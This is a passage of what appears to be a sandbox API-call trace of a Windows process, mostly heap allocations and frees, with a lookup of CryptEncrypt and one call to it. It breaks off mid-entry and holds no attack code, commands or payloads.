HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0160.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0160.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0160.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0160.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0160.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0160.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0160.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0160.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0160.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0160.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0160.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0160.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0160.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0160.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50bf0 [0160.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50bf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0160.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.727] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0160.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543a0 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0160.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0160.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0160.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0160.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0160.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0160.728] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x2f600, dwBufLen=0x2f608 | out: pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x2f608) returned 1 [0160.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0160.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0160.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0160.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0160.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0160.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0160.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0160.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0160.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0160.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0160.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0160.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0160.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0160.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0160.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0160.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0160.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0160.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0160.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0160.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0160.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0160.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0160.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0160.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0160.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0160.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0160.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0160.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3c1f660 [0161.047] HeapFree (in: hHeap=0x970000, 